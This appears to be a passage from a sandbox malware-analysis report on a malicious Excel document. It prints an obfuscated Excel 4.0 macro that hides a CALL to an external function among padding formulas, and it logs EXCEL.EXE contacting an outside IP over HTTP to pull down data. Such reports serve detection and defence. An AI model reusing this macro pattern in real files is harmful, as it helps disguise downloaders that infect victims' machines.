(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=CALL(Docs1!BV9,Docs1!BV10,Docs3!BK26&Docs3!BK28,0,before.3.13.34.sheet!AK14&before.3.13.34.sheet!AK15&Docs3!BP25&before.3.13.34.sheet!AN14,Docs3!BM23,0,0)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=Docs1!$AX$27()",,,,,
=HALT()
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 05:51:04.744469881 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:04.907798052 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:04.907898903 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:04.908396006 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.069098949 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.299613953 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.299679041 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.299716949 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.299757004 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.299799919 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.299849033 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.299885988 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.299906015 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.299926043 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.299967051 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.300005913 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.300005913 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.300056934 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.310271978 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.463424921 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.463486910 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.463525057 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.463565111 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.463603973 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.463653088 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.463690996 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.463756084 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.463768959 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.463795900 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.463850021 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.463896990 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.463951111 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.463953972 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.463998079 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.464026928 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.464037895 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.464077950 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.464118004 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.464123011 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.464157104 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.464180946 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.464185953 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.464229107 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.464270115 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.464310884 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.464339972 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.464360952 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.464402914 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.464441061 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.464437008 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.464471102 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.464489937 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.464508057 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.464535952 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.464585066 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.464596987 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.468918085 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.627324104 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627388954 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627420902 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627460003 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627500057 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627540112 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627582073 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627619982 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627660036 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627698898 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627708912 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.627749920 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627794027 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627823114 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.627834082 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.627840042 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.627840996 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627872944 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.627878904 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.627883911 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627907991 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.627912045 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.627928019 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627968073 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627969027 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.628002882 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.628011942 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.628043890 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.628051996 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.628072977 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.628099918 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.628118038 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.628185987 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.628207922 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.628249884 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.628289938 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.628295898 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.628328085 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.628333092 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.628359079 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.628367901 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.628400087 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.628407955 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 05:51:04.550579071 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 7, 2021 05:51:04.719516039 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 7, 2021 05:51:04.550579071 CEST | 192.168.2.22 | 8.8.8.8 | 0x1168 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 7, 2021 05:51:04.719516039 CEST | 8.8.8.8 | 192.168.2.22 | 0x1168 | No error (0) | 192.232.249.186 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 192.232.249.186 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 05:51:04.908396006 CEST | 0 | OUT | |
Apr 7, 2021 05:51:05.299613953 CEST | 2 | IN |